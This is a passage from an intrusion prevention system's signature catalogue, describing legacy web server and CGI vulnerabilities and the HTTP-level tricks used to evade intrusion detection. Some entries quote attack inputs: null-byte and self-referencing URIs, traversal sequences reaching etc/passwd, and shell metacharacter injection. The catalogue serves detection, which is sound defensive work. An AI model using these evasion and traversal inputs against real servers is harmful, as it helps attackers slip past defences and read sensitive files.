5.0 allows attackers to cause a denial of service or execute arbitrary code via HTR requests with long variable names.
Signature ID: 268
JRun directory traversal vulnerability
Signature Description: JRun is an application server from Macromedia that is based on Sun Microsystems Java 2
Platform, Enterprise Edition (J2EE). JRun consists of Java Server Page (JSP), Java servlets, Enterprise JavaBeans, the
Java Transaction Service (JTS), and the Java Messaging Service (JMS). JRun works with the most popular Web servers
including Apache, Microsoft's Internet Information Server (IIS), and any other Web server that supports Internet Server
Application Program Interface (ISAPI). Macromedia JRun 2.3.3, Macromedia JRun 3.0 and Macromedia JRun 3.1 are
vulnerable to directory traversal. A successful exploitation of this vulnerability allows an attacker to access sensitive
information on the vulnerable system.
Signature ID: 269
IIS 5.0 Sample Application physical path disclosure vulnerability
Nessus: 10573
platforms. A sample application shipped with IIS 5.0 discloses the physical path of the web root. An attacker can use
this information to make more focused attacks.
Signature ID: 270
IIS 5.0 Sample App vulnerable to cross-site scripting attack
Nessus: 10572
platforms. The sample script ‘/iissamples/sdk/asp/interaction/Form_JScript.asp’ takes user input into a
form field. On submission, it displays a page with the text that the user entered. This script does not perform any input
validation. Hence, malicious users can use this script to do a cross site scripting attack.
Signature ID: 271
GroupWise Web Interface 'HTMLVER' vulnerability
Signature Description: GroupWise is a cross-platform collaborative software product from Novell, Inc. offering e-mail,
calendaring, instant messaging and document management. GroupWise includes a web access component for use
through a web browser. In Novell Groupwise Web Access 5.5 ,GWWEB.EXE allows remote attackers to determine the
physical path of the web server root directory using a HTTP request with an invalid HTMLVER parameter. An attacker
can use this information to make more focused attacks.
49
Signature ID: 273
GroupWise Web Interface 'HELP' path disclosure vulnerability
through a web browser. Novell Groupwise 5.2 to 5.5(inclusive), the HELP function in GWWEB.EXE will reveal the
physical path of the web server root directory. An attacker can use this information to make more focused attacks.
Signature ID: 274
GroupWise Web Interface 'HELP' file disclosure vulnerability
through a web browser. Novell Groupwise 5.2 to 5.5(inclusive), the HELP function in GWWEB.EXE is vulnerable to a
file disclosure vulnerability that can be exploited with a '../' character sequence. A malicious user can access any
‘.htm’ file on the server and browse directory listings. An attacker can use this information to make more
focused attacks.
Signature ID: 275
Finger cgi vulnerability
Industry ID: CVE-1999-0612 Nessus: 10071,10068
application software with an information server, commonly a web server. The Finger command shows user
information. If the ‘finger’ command is installed in the cgi-bin directory, it may give sensitive user
information to a malicious user. An attacker can use this information to make more focused attacks.
Signature ID: 277
Unify eWave ServletExec 3.0C file upload vulnerability
Signature Description: Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers like
Microsoft IIS, Apache and Netscape Enterprise Server. Unify eWave ServletExec 3.0 c contains an unregistered servlet
called 'UploadServlet' whose access is not restricted. By sending a specially formed HTTP 'GET' or 'POST' request, it
is possible for a remote user to upload any file to any directory on the web server. Successful exploitation of this
vulnerability could lead to a compromise of the web server.
Signature ID: 278
Authentication bypass in Lotus Domino database access vulnerability
Signature Description: Lotus Domino Server is an application framework for web based collaborative software. It runs
on multiple platforms. Lotus Domino 5.0.9 a and earlier convert '+' characters in a file request to a ' ' characters. By
requesting a Notes template files (.ntf) or a Notes Database files (.nsf) with a maliciously constructed file name having
a a certain number of "+" characters before the .nsf file extension, remote attackers can bypass security restrictions and
view sensitive information in these files.
50
Signature ID: 279
CVS Entries access misconfiguration vulnerability
Nessus: 10922
Signature Description: Access to 'CVS/Entries' path is detected by this signature. Access to this path exposes all file
names in CVS module on the web server. This may give sensitive information to a malicious user. He can use this
information to make more focused attacks to gain access to these files.
Signature ID: 280
IIS ASP.NET Application Trace log retrieval vulnerability
Nessus: 10993
platforms. ASP.NET is a web application framework developed and marketed by Microsoft, that programmers can use
to build dynamic web sites, web applications and web services. The ASP.NET web application running in the root
directory of the web server has application tracing enabled. This allows an attacker to view the last 50 web requests
made to the web server, including sensitive information like Session ID values and the physical path to the requested
file. An attacker can use this information to make more focused attacks.
Signature ID: 281
BroadVision One-To-One Enterprise Physical Path Disclosure Vulnerability
Signature Description: BroadVision One-To-One Enterprise is a scalable e- business application platform.
BroadVision One-To-One Enterprise 1.0 allows remote attackers to determine the physical path of server files by
requesting a non existent '.JSP' file. An attacker can use this information to make more focused attacks.
Signature ID: 282
ASP.NET Cross Site Scripting Vulnerability
platforms. ASP.NET is a web application framework developed and marketed by Microsoft, that programmers can use
to build dynamic web sites, web applications and web services. In Microsoft IIS 4.0 to 5.1 (inclusive), Cross-site
scripting vulnerability (XSS) in the ASP function responsible for redirection allows remote attackers to embed a URL
containing a client side script. This script will execute when redirection message from server is displayed.
Signature ID: 283
AlienForm CGI script vulnerability
application software with an information server, commonly a web server. AlienForm2 is an interface to the email
gateway written in Perl and is maintained by Jon Hedley. The cgi is typically installed as 'af.cgi' or 'alienform.cgi'. In
Jon Hedley AlienForm2 1.5, directory traversal vulnerability allows remote attackers to read or modify or create
arbitrary files via '.|.%2F' character sequence in the _browser_out parameter or _out_file parameter. This signature
detects attacks on 'af.cgi' program.
51
Signature ID: 284
AlienForm CGI script vulnerability
application software with an information server, commonly a web server. AlienForm2 is an interface to the email
gateway written in Perl and is maintained by Jon Hedley. The cgi is typically installed as 'af.cgi' or 'alienform.cgi'. In
Jon Hedley AlienForm2 1.5, directory traversal vulnerability allows remote attackers to read or modify or create
arbitrary files via '.|.%2F' character sequence in the _browser_out parameter or _out_file parameter. This signature
detects attacks on 'alienform.cgi' program.
Signature ID: 285
Agora CGI Cross Site Scripting Vulnerability
application software with an information server, commonly a web server. Agora.cgi is a freely available, open source
shopping cart system. When debug mode is enabled in Agora.cgi Agora.cgi 3.2 to 4.0 g (inclusive), the script does not
filter HTML tags in the cart_id parameter. As a result, it is possible for an attacker to construct a malicious link with a
client side script code. When the link is clicked by a client, the script code will be executed by the browser in the
context of the web server. This may result in a variety of problems from sensitive information disclosure to session
hijacking. Please note that debug mode must be manually enabled by the web server administrator.
Signature ID: 286
AdMentor sql injection Vulnerability
Signature Description: AdMentor is a free collection of ASP scripts created by Stefan Holmberg. AdMentor provides
banner ad rotation functionality. SQL injection is a technique that exploits a security vulnerability occurring in the
database layer of an application due to improper filtering of user input. A SQL injection vulnerability has been reported
in admin.asp as provided with AdMentor 2.11 through 'userid' and 'pwd' arguments. This is because special characters
such as '(quote) are not filtered from user input. This allows remote attackers to bypass authentication and gain
privileges.
Signature ID: 294
commands with the privileges of the http server. This signature detects GET request access to Bourne shell, Almquist
shell, Bourne-Again shell, C shell, Korn shell, TENEX shell and Z shell in the CGI directory.
52
Signature ID: 295
Finger web gateway access vulnerability
application software with an information server, commonly a web server. The Finger command shows user
information. Some web sites implement a web gateway to the "finger" service, allowing remote web clients to execute
finger queries against arbitrary hosts. In environments where the "finger" service has been determined to be a security
risk (due to the sensitivity of the information it provides), a web finger gateway can be used to execute finger queries
against the server, allowing an attacker to obtain information about its users. An attacker can use this information to
make more focused attacks. This signature detects reconnaissance attempts on other hosts using such finger gateway.
Signature ID: 296
AnyForm CGI check vulnerability
application software with an information server, commonly a web server. AnyForm is a CGI program written by John
S. Roberts that allows webmasters to create arbitrary form submission pages without writing a dedicated CGI program
for each form. AnyForm runs the Bourne shell to execute Sendmail, which it uses to send form results to the web
administrator. In AnyForm 1.0 amd 2.0, due to improper quoting of form field parameters, an attacker can place shell
meta characters in the form fields. This allows execution of arbitrary commands by the attacker using AnyForm with
the privileges web server.
Signature ID: 298
PHP mlog Example Script arbitrary file access vulnerability
Signature Description: Personal Home Page/Form Interpreter (PHP/FI) is computer scripting language designed for
producing dynamic web pages. In PHP PHP/FI 1.0 to 2.0 b10(inclusive), "mlog.html" sample script does not sanitizing
input passed to the "screen" variable and hence allows an attacker to read arbitrary files on the web server. An attacker
can use this information to make more focused attacks.
Signature ID: 299
PHP mylog Example Script arbitrary file access vulnerability
Signature Description: Personal Home Page/Form Interpreter (PHP/FI) is computer scripting language designed for
producing dynamic web pages. In PHP PHP/FI 1.0 to 2.0 b10(inclusive), "mylog.html" sample script does not
sanitizing input passed to the "screen" variable and hence allows an attacker to read arbitrary files on the web server.
An attacker can use this information to make more focused attacks.
Signature ID: 300
IRIX MachineInfo Script vulnerability
Industry ID: CVE-1999-1067
their 32 and 64-bit MIPS architecture workstations and servers. A vulnerability exists in the 'InfoSearch' package as
included by Silicon Graphics in their IRIX operating system versions 5.3 and 6.4. An attacker can obtain sensitive
53
information about the computer including the type and speed of the processor, memory details, and other details of
installed hardware. An attacker can use this information to make more focused attacks.
Signature ID: 301
WinGate Logfile Server Vulnerability
Signature Description: WinGate Proxy Server provides a Log File Server on port 8010 to remotely view logfiles. In
certain cases this server may be enabled by default. If this service accepts connections from remote hosts, the entire file
system may be accessible, allowing remote users to access, read or download any file on vulnerable system.
Signature ID: 304
Convert.bas arbitrary file access vulnerability
Signature Description: NetWare is a network operating system developed by Novell, Inc. Netware comes with a set of
services for TCP/IP stack, one of which is a web server.The Common Gateway Interface (CGI) is a standard protocol
for interfacing external application software with an information server, commonly a web server. In Novell NetWare
Web Server 2.0, a CGI written in BASIC called "convert.bas" allows retrieval of files outside of the normal web server
context. This can be accomplished by submitting the file name and path as a parameter to the script, using (../../)
character sequence to traverse directories. Access may or may not be limited to the SYS: volume.
Signature ID: 305
ColdFusion Evaluator sample program vulnerability
development of computer software in general, and dynamic web sites in particular. In ColdFusion Server 2.0 to 4.0 ,
'Expression Evaluator' is a sample script included to demonstrate the expression evaluation features of ColdFusion. A
vulnerability exists in this script that could allow remote attackers to create, view or delete arbitrary files on the server.
Even though this program cannot be accessed except from localhost, an attacker can directly request parts of the
program from remote system. 'openfile.cfm' and 'openedfile.cfm' allows upload of files to the sever. 'exprcalc.cfm'
processes the uploaded file, displays it and then deletes it. An attacker can bypass this issue by using exprcacl.cfm to
delete itself.
Signature ID: 306
Coldfusion web administration Denial of Service Vulnerability
development of computer software in general, and dynamic web sites in particular. In ColdFusion 4.0 and 4.0.1,
ColdFusion Administrator with Advanced Security enabled allows remote users to stop the ColdFusion server via the
Start/Stop utility.
Signature ID: 307
HAMCards Postcard arbitrary code execution vulnerability
application software with an information server, commonly a web server.HAMCards Postcard script is a perl mail CGI
Program. HAMCards Postcard script v1.0 Beta 2 allows remote attackers to execute arbitrary commands via shell meta
54
characters in the recipient email address. This is possible as open() call is used without filtering user input. An attacker
can use shell meta characters such as '|' to execute arbitrary code.
Signature ID: 308
IIS appended dot file disclosure vulnerability
Industry ID: CVE-1999-0154 CVE-1999-0253 Bugtraq: 2074
Signature Description: This version of Microsoft Internet Information Server (IIS) displays the source to active server
pages (.asp files), if a period is appended to the URL. Scripting information, in addition to other data in the file, is
visible. Potentially proprietary web server files (such as .ASP, .HTX, and .IDC file name extensions) may contain
sensitive information (such as user IDs and passwords) embedded in the source code but not normally available to
remote users.
Signature ID: 310
Apache mod_cookies Buffer Overflow Vulnerability
Signature Description: The Apache Project is a collaborative software development effort aimed at creating a robust,
commercial-grade, feature rich, and freely-available source code implementation of an HTTP (Web) server. Apache
Software Foundation Apache 0.8.11 to 1.1.1 (inclusive) are vulnerable to a buffer overflow attack. This overflow is due
to function make_cookie, in mod_cookies.c using a 100 byte buffer. As a result, remote attackers can exploit this
vulnerability to execute arbitrary code on the server with the privileges of Apache server.
Signature ID: 311
Apache Debian Information disclosure Vulnerability
Signature Description: The Debian GNU/Linux 2.1 apache package allows any remote user to view /usr/doc if default
settings are used. This is because 'srm.conf' file is preconfigured with the alias mapping '/doc/' to '/usr/doc/'. This allows
a remote attacker to gain access to sensitive information such as the versions of the software installed. An attacker can
use this information to make more focused attacks.
Signature ID: 313
IIS .htr file access misconfiguration vulnerability
platforms. Microsoft IIS 4.0 installs a remotely accessible directory called '/IISADMPWD' which is mapped to
'c:\winnt\system32\inetsrv\iisadmpwd'. This directory contains a number of vulnerable '.HTR' files. These files were
designed to allow system administrators the ability to provide HTTP based password change services to network users.
These files can be used to determine whether or not an account exists on the host, as well as to conduct brute force
attacks. The response messages from the server allow an attacker to determine if his request was valid or not.
These files can also be used to conduct the same type of attacks on other hosts in the LAN. Thus, an attacker can gain
access to any system on the same LAN using this vulnerability.
Signature ID: 314
IIS sample script source code disclosure vulnerability
Industry ID: CVE-1999-0739 CVE-2002-1744 CVE-2002-1745
55
Signature Description: The "codebrws.asp" sample shipped with IIS 4.0 and SiteServer 3.x can be remotely exploited
to read arbitrary files on vulnerable servers. This file is one of several sample files distributed with these servers that
allows remote file viewing.
Signature ID: 317
Sambar Server Default Account vulnerability
Bugtraq: 2255
Signature Description: Sambar Server is a multi-threaded HTTP, FTP, and Proxy server for Windows NT. By default
the server ships with the default account "admin" with no password, which could allow a remote attacker to gain
complete control of your server if it is not changed. The server also ships with two other, though non-privileged
accounts "anonymous" and "guest" which should be disabled.
Signature ID: 318
NT Site Server sample Ad Server information disclosure Vulnerability
Signature Description: Microsoft Site Server is a software solution from Microsoft for Internet-based commerce (or ecommerce). A vulnerability exists in Microsoft Site Server 3.0 alpha. The 'Ad Server' Sample directory has the
'SITE.CSC' file which contains sensitive configuration information about the SQL database. Due to misconfiguration in
default access control specifications, the Microsoft Site Server allows retrieval of this file. Information gained from this
may lead to compromise of highly sensitive information on the web server.
Signature ID: 325
O'Reilly WebSite win-c-sample.exe buffer overflow vulnerability
Signature Description: O'Reilly WebSite Professional is a Windows based Web Server package. One of the sample
programs in O'Reilly Software WebSite Professional 1.0 to 2.0 (inclusive) is vulnerable to a buffer overflow that allows
execution of arbitrary commands on the host machine with the privileges of the web server. The vulnerability exists in
'win-c-sample.exe' CGI program available in '/cgi-shl/' directory.
Signature ID: 328
Nph-publish arbitrary file overwrite vulnerability
application software with an information server, commonly a web server. 'nph-publish' is a perl CGI script that allows
Apache to "publish" files created with HTML editors like Netscape Navigator Gold. Directory traversal vulnerability in
nph-publish before 1.2 allows remote attackers to overwrite arbitrary files via a '..' (dot dot) character sequence in the
path name for an upload operation. A malicious attacker can gain complete control of the server using this
vulnerability.
Signature ID: 329
Textcounter.pl cgi arbitrary command execution vulnerability
Signature Description: Textcounter.pl is a script by Matt Wright that provides features like counters, guest books, and
http cookie management to the website. Due to insufficient validation of user input in Matt Wright TextCounter 1.2, it
56
is possible for a remote user to manipulate the contents of '$DOCUMENT_URI' environment variable so that they will
be executed with the UID of the httpd process when parsed by the interpreter. A malicious user can hence execute
arbitrary commands on the web server.
Signature ID: 330
ColdFusion fileexists.cfm file status information disclosure vulnerability
development of computer software in general, and dynamic web sites in particular. ColdFusion Server 4.0 contains a
flaw that allows a remote attacker to confirm the existence of any file on the server. The flaw is due to insufficient
checking of arguments passed to the fileexists.cfm script.
Signature ID: 331
ColdFusion sourcewindow.cfm arbitrary file disclosure vulnerability
development of computer software in general, and dynamic web sites in particular. A vulnerability in ColdFusion
Server 4.0 sample program 'sourcewindow.cfm' could allow remote attackers to read any file on the system. An
attacker can use this information to make more focused attacks.
Signature ID: 332
ColdFusion viewexample.cfm arbitrary file disclosure vulnerability
flaw that allows a remote attacker to gain sensitive information. The flaw is due to insufficient checking of arguments
passed to the 'viewexample.cfm' script. This could allow the attacker to view any file on the server. An attacker can use
this information to make more focused attacks.
Signature ID: 333
ColdFusion Syntax Checker DoS Vulnerability
flaw that allows a remote attacker to cause a denial of service. The flaw is due to insufficient checking of arguments
passed to the Syntax Checker program.
Signature ID: 334
Bnbform CGI File Disclosure Vulnerability
Signature Description: BNBForm is a form processing script by BigNoseBird. BNBForm supports automatic form-toemail processing of user submitted forms. A vulnerability in how this is implemented could allow a remote attacker to
receive arbitrary files on the vulnerable server. This signature triggers an alarm when any access to bnbform.cgi is
detected.
57
Signature ID: 335
BNB survey.cgi CGI arbitrary command execution Vulnerability
application software with an information server, commonly a web server. Big Nose Bird Survey.cgi is a free and simple
'Web Survey' program. Due to insufficient checking of arguments in BNBSurvey 1.0, shell metacharacters (such as the
pipe '|' character, redirection characters '>' and '<') in user supplied input are not filtered. This allows an attacker to
execute shell commands with the privileges of the web server.
Signature ID: 336
Multiple vulnerabilities in Classifieds.cgi CGI script
Signature Description: Classifieds.cgi is a perl script that is part of the classifieds package by Greg Matthews. This
CGI script provides management functionality for classified ads on web sites. Due to insufficient validation of user
input, an attacker can read arbitrary files and execute arbitrary commands with the privileges of the web server. One of
the vulnerable fields is the form field used for e-mail address details. The other attribute is a hidden variable in a CGI
form.
Signature ID: 337
Counter.exe CGI DoS Vulnerability
application software with an information server, commonly a web server. counter.exe is a web hit counter program. A
set of vulnerabilities in Behold! Software Web Page Counter 2.7 enables denial of service attacks. These are possible
due to insufficient input validation. This signature detects DoS attack attempts caused due to a long URI string.
Signature ID: 340
Novell files.pl arbitrary file access vulnerability
Signature Description: NetWare is a network operating system developed by Novell, Inc. Netware comes with a set of
services for TCP/IP stack, one of which is a web server.The Common Gateway Interface (CGI) is a standard protocol
for interfacing external application software with an information server, commonly a web server. In Novell Web Server
1.0 Examples Toolkit, a vulnerability in the files.pl script allows a remote attacker to view the contents of any file or
directory on vulnerable servers with the privileges of the user owning the server process.
Signature ID: 341
View-Source CGI arbitrary file access vulnerability
application software with an information server, commonly a web server. SCO Skunkware is a collection of Open
Source software projects ported, compiled, and packaged for free redistribution on SCO operating environments. The
'view-source' CGI script in SCO Skunkware 2.0 could allow a remote attacker to view files on the Web server. By
accessing the view-source script with specially formatted arguments, a remote attacker can view the contents of any file
58
on the system with the privileges of the user owning the server process. An attacker can use this information to make
more focused attacks.
Signature ID: 342
Wwwboard.pl CGI arbitrary post modification vulnerability
application software with an information server, commonly a web server. The WWWBoard package is a popular web
based discussion board by Matt Wright. Matt Wright WWWBoard 2.0 Alpha 2 allows a remote attacker to delete or
overwrite message board articles via a malformed argument. This is accomplished by submitting a POST request of
hidden type with attribute 'name' having value as 'followup' and attribute 'value' having value corresponding to a
previously existing message.
Signature ID: 343
Long HTTP Request Line Detction
Industry ID: CVE-1999-0931 CVE-2001-0282 CVE-2000-0398 CVE-2000-0626 Bugtraq: 734,1244,1482 Nessus:
10958,10637,10012,10421
Signature Description: This rule is triggered when an URL of length more than the configured value is detected . Most
of the time, under normal conditions, URL of such a big length is not sent. The presence of such a lengthy URL is
suspicious (unless the server is accepting GET request with lot many parameters for a particular script). It is possible to
do a buffer overflow attack in the remote http server when it is given a very long http request line. An attacker may use
it to execute arbitrary code on the host. The administrator is advised to check the target web server logs to analyze the
session associated with this log.
Signature ID: 344
HTTP large request header Size detection
10637,10012,10421
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol, with its version 1.1
defined in RFC 2616. HTTP header fields, which include general-header, request-header, response-header, and entityheader fields, follow the same generic format as that given in RFC 822. Each header field consists of a name followed
by a colon (":) and the field value. Though no limit is specified in any RFC as such, depending upon a server, it may be
assuming some limit for each field and any attempt to put more data than expected, may result in buffer overflow.
There may be server implementations which allocate limited buffer for overall header size. In such case, overflow may
occur in either of the two conditions - a)large data is supplied in a single field; or b) all (or most) fields are given
sufficiently large data so that overall header size goes up. This rule tries to capture any such attempt. An attacker may
use this vulnerability to execute arbitrary code on the host. This rule is triggered when request header size exceeds
configured value in the IIPS Manager. The administrator is advised to check the HTTP server logs for any misuse.
Signature ID: 345
HTTP Long Header Line Size detection
10515,10154,10119
59
by a colon (":) and the field value. It is possible to do a buffer overflow attack in the remote http server when some of
the header field is given a very long argument (line) in request. An attacker may use it to execute arbitrary code on the
host. This rule is triggered when some header line size in request exceed configured value.
Signature ID: 346
Detection of large number of request header lines
by a colon (":) and the field value. It is possible to do a buffer overflow attack in the remote http server when it is given
large number of request header lines in the request. An attacker may use it to execute arbitrary code on the host. This
rule is triggered when the number of header lines exceed configured value
Signature ID: 347
HTTP malformed Request detection
Signature Description: This signature detects an IIPS evasion technique. According to the HTTP RFC, the v1.0 request
should be in the form - Method <space> URI <space> HTTP/ Version CRLF . As a result, many intelligent IDS/IPS
systems disect HTTP requests using <space> as a seperator. Apache 1.3.6 and newer allow HTTP requests in the form Method <tab> URI <tab> HTTP/ Version CRLF. Such a request will cause problems in parsing by an IDS/IPS system
assuming RFC based format.
Signature ID: 348
IDS evasion detection - NULL Character at the end of URI
Signature Description: This signature detects an IIPS evasion technique. Many C string libraries use the NULL
character to denote the end of the string. Most Intrusion Detection systems use these libraries or assume the same. An
attacker can use this to evade the system with the following type of request:GET /cgi-bin/some.cgi\0 HTTP/1.0. As
many IDS/IPS try to parse the entire packet, they will stop at the null byte, ignoring the rest of the request. The HTTP
server on the other hand maintains each field in the request packet as a logically separate field. As a result, a NULL
byte at the end of the URI is treated as the termination of the URI. Other fields are decoded separately.
Signature ID: 349
HTTP v0.9 Syntax Request detection
defined in RFC 2616. The current HTTP version is 1.0 or 1.1. The older version 0.9 is not used by most of the
server/clients. But there may be servers that supports HTTP version 0.9 also. The syntax for HTTP request for version
0.9 is <method><space><uri><CRLF>. This syntax is different from that of version 1.0 and 1.1. Therefore, using old
syntax sometimes helps attackers to evade a modern IDS/IPS as such devices parse the URI according to version 1.0 or
1.1 and fail to detect the anomaly in case of version 0.9 HTTP request.
Signature ID: 350
HTTP Request Format Anomaly detection
defined in RFC 2616. A general HTTP request should be of the form - <Method uri [version]\r\n>. After \r, \n is
60
expected. No other character is expected between \r and \n. This signature detects traffic that has a character, other than
\n, after \r, in the URI. Such traffic is generated to evade the IDS/IPS.
Signature ID: 351
Multiple requests in same packet vulnerability
Signature Description: This is an anti IIPS evasion technique. HTTP 1.1 server supports persistent connection. Server
can serve many requests from a client with same connection.Normally browsers send separate requests in separate
packets.But an attacker can send more than one request in a single packet to evade IDS. Many IDS just check only the
first request in the packet. So attacker can send the real attack as the second or third request in the same packet to the
server by evading IDS.
Signature ID: 352
HTTP Request Session Splicing vulnerability
Signature Description: Session splicing is a network-level anti-ID system tactic. Many raw ID systems, as well as some
smart ones, only scan for a particular signature within the current packet--signatures are not split up and checked across
multiple packets. Attacker exploits this by sending parts of the request in different packets. Note that this is not
fragmentation; it is just multiple packets for the data. For example, the request "GET / HTTP/1.0" may be split across
multiple packets to be "GE", "T ", "/", " H", "T", "TP", "/1", ".0".
Signature ID: 353
Encoded request vulnerability
Signature Description: The classic trick with request encoding is to encode the request with it's escaped equivalent. The
HTTP protocol specifies that arbitrary binary characters can be passed within the request by using %xx notation, where
'xx' is the hex value of the character. In theory, the raw ID systems would fall prey to this, since the signature "cgi-bin"
does not match the string "%63%67%69%2d%62%69%6e". Also, in theory, the smart ID systems would be able to
plow past this, since they would decode the string similar to a web server before actually checking for a signature. In
reality, nowadays all worthwhile ID systems decode encoded requests, so this tactic is becoming obsolete.
Signature ID: 354
NULL Character in HTTP Request Line vulnerability
defined in RFC 2616. HTTP header fields, which include general-header, request-header, response-header, and entityheader fields, follow the same generic format as that given in RFC 822. The Request-Line begins with a method token,
followed by the Request-URI and the protocol version, and ending with CRLF. The elements are separated by space
(SP) characters. No CR or LF is allowed except in the final CRLF sequence. A general HTTP request should look like:
Method SP Request-URI SP HTTP-Version CRLF. This log corresponds to an anti IIPS evasion technique. Many C
string libraries use the NULL character to denote the end of the string. Most intrusion detection/prevention systems use
these libraries to match the incoming strings (patterns) with the stored signatures. Attacker can use this to her
advantage with the following type of request: GET\0/cgi-bin/some.cgi HTTP/1.0. The theoretical flow of this tactic
goes like: Web server receives request, separating the uri from the method. Web server decodes method and URI (or
vice-versa, maintaining a logically separate string containing the method). The method is still valid in and of itself, as a
string, to the web server, even with the trailing NULL. Few IDS, on the other hand, decodes the entire request and
attempts to apply string operations on the request. It stops once the NULL is reached, because intern it is calling C
library. The implication of this is that an attacker can send any URI (malicious) and even can bypass the IDS. The
administrator should check the web server log corresponding to this log.
61
Signature ID: 355
HTTP Mis-Formatted URI with Many White Space as Separator
Method SP Request-URI SP HTTP-Version CRLF. This log corresponds to an anti IIPS evasion technique. A smart ID
system could feasibly extract the URI of a request by using SP (spaces) as separators, and adjust accordingly.
Interestingly enough, Apache (and perhaps earlier versions) allow you to specify a slightly different syntax:
Method<any number of spaces> URI < any number of spaces> HTTP/ Version CRLF CRLF. This will ruin any
processing dependant on the 'assumed' RFC format of a request. This implies that there can be extra spaces charactors
in the URI and IDS may miss some exact match. This rule triggers the alarm on receiving a HTTP request with many
space characters as separator. The administrator should check the web server for corresponding log.
Signature ID: 356
HTTP Invalid Version String vulnerability
Method SP Request-URI SP HTTP-Version CRLF; where HTTP-version should be HTTP/x.y. This rule triggers an
alarm when the version string is not found in the form, it is described above. This alert may not indicate any attack as
such. But as a precaution, the administrator should check the web server logs.
Signature ID: 357
HTTP Header with Very Big Content Length vulnerability
Signature Description: Hypertext Transfer Protocol is a communications protocol for the transfer of information on the
Internet. Its use for retrieving inter-linked text documents (hypertext) led to the establishment of the World Wide Web.
In HTTP request, a content length header indicates how many bytes of data follows. This rule will trigger if IIPS
receives a very big content length in the request header. This log may not represent any attack, but should be
monitored.
Signature ID: 359
DOS/Win Directory Path Syntax in URI vulnerability
Nessus: 10843
Signature Description: This is an anti IIPS evasion technique. Microsoft windows separates directories using '\' unlike
Unix. However, if you notice in the HTTP RFC, the syntax calls for '/'. So MS Windows must silently convert from '/'
to '\' internally in IIS (as well as all other DOS/Windows based web servers). Interestingly enough, we can still use '\' in
our requests, since they are still valid as directory separators. This implies that on DOS/Windows platforms, we can use
requests such as "/cgi-bin\some.cgi", which will not match a typical "/cgi-bin/some.cgi" signature. Using such
techniques, an attacker can bypass IDS/IPS, even though there is some relevant rules for the attack or malicious
attempt.
62
Signature ID: 360
HTTP Absolute URI Present vulnerability
Signature Description: According to RFC 2396, A Uniform Resource Identifier (URI) is a compact string of characters
for identifying an abstract or physical resource by denoting them in either absolute or relative form. An absolute
identifier refers to a resource independent of the context in which the identifier is used. In contrast, a relative identifier
refers to a resource by describing the difference within a hierarchical name space between the current context and an
absolute identifier of the resource. A relative URI always starts with a '/' and normally HTTP clients request by using
this method (except proxy, in that case, absolute URI is used).
Signature ID: 361
HTTP Multiple Slashes in URI vulnerability
Nessus: 10843
Signature Description: This is an anti IIPS evasion technique. According to HTTP RFC, every URI should use '/' to
traverse directory. However, most of the HTTP servers interpret '//' as '/'. Therefore "//cgi-bin//some.cgi" will correctly
be treated as "/cgi-bin/some.cgi" by the web server. However, if an IDS/IPS is not aware of this interpretation, it will
not match "//cgi-bin//some.cgi" as the signature will be "/cgi-bin/some.cgi". However, Smart ID systems tend to
correctly interpret this by logically combining all slashes into one or at least reporting such an attempt.
Signature ID: 362
URI Reverse Traversal vulnerability
Signature Description: This is an anti IIPS evasion technique. This rule is more informational in nature. A classic trick
is to break apart a request such as "/cgi-bin/some.cgi HTTP/1.0" by using reverse traversal directory tricks:GET /cgibin/blahblah/../some.cgi HTTP/1.0" which equates to "/cgi-bin/some.cgi". Most smart ID systems account for this (it's a
core feature of what makes them 'smart'), and raw ID systems usually alert the fact that the request contains "/../".
Signature ID: 363
Attempt to Access Objects Beyond Web Root
Industry ID: CVE-2000-0664 CVE-2000-0884 CVE-2000-0919 CVE-2002-0307 CVE-2001-1204 CVE-2001-0871
CVE-2000-0187 CVE-2000-0674 CVE-2000-0126 CVE-2000-1076 CVE-2001-0804 CVE-2000-1019 CVE-20011209 CVE-1999-0776 CVE-1999-1509 CVE-2002-0661 CVE-2008-1145 CVE-2005-2847 Nessus:
10831,11001,10872,10819,10669,10818,10489,10025,10065,10467,10602,10115,10537,10589,10562,10789,10593,10
750,10574,10776,10656,10770,10817,10584,10542,10297,10367,10830,10672,10875,10010,10536,10063
defined in RFC 2616. HTTP is a client-server type protocol, wherein a client makes a request and server tries to fulfill
that request. As the web server runs one system, which serves some other services to user and therefore may contain
some sensitive data, like password to the system itself in "etc/passwd" file. There exist a possibility that some client
may request a sensitive file also. In order to deal with such problems, a root directory of the web server is defined. All
the files, which can be requested are, generally, kept under this directory. If a client has to request something sensitive,
he will have to come out from the root directory of the server by doing a directory traversal (/../../..). This rule triggers
an alarm when there has been an attempt to access objects which are beyond the web root directory. Such an attempt is
suspicious, specially from outside, and should be monitored for further analysis by the administrator. The rule triggers
when it encounters "/../" in the request.
63
Signature ID: 364
URI Self-Reference Directory vulnerability
Nessus: 11007
Signature Description: This is an anti IIPS evasion technique. A newer trick in the 'directory games' category is the
self-referencing directory. While '..' means the parent directory, '.' means the current directory. So "c:\temp\.\.\.\.\.\" is
equivalent to "c:\temp\". In an effort to stop the raw ID systems from matching signatures like "/cgi-bin/phf", we can
change the string to "/./cgi-bin/./phf". This rule hits when system detects a HTTP request with above-mentioned trick.
Signature ID: 365
Long HTTP Request Line Detected vulnerability
Signature Description: This rule is triggered when an URL of length more than the configured value is detected. Most
of the time, under normal conditions, URL of such a big length is not sent. The presence of such a lengthy URL is
suspicious. It is possible to do a buffer overflow attack in the remote http server when it is given a very long http
request line. An attacker may use it to execute arbitrary code on the host.
Signature ID: 366
Premattured URL request vulnerability
Signature Description: This rule will trigger when the users send \r and \n characters in the encoded format. The actual
URL will be sent \r and \n characters after the encoded. A remote attacker could exploit this vulnerability to execute
arbitrary commands on the system.
Signature ID: 367
HTTP Large Cookie Field Received vulnerability
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol for
distributed,collaborative, hypermedia information systems. There are many header fields in HTTP request. It has been
reported that there is a possibility of buffer overflow in any of these fields. This rule triggers when a cookie field data
exceeds 6K bytes.
Signature ID: 368
GET or HEAD HTTP Request Packet with Data in Message Body vulnerability
Signature Description: This rule triggers when an attempt is made to send some data in message body (data portion) of
a HTTP request when GET or HEAD method is used. When a request is made using either of these methods data will
be usually sent as part of URL. If content is observed in data portion this can be treated as an anomaly. But RFC doesn't
say anything about sending data as part of message body in a HTTP request when GET or HEAD method is used.
Signature ID: 369
HTTP URI Invalid UTF 16 Encoding vulnerability
Signature Description: In order to represent characters beyond ASCII, Unicode is introduced, which allows to have
character values much beyond ASCII (256). In order to represent those Unicode points, there are many encoding
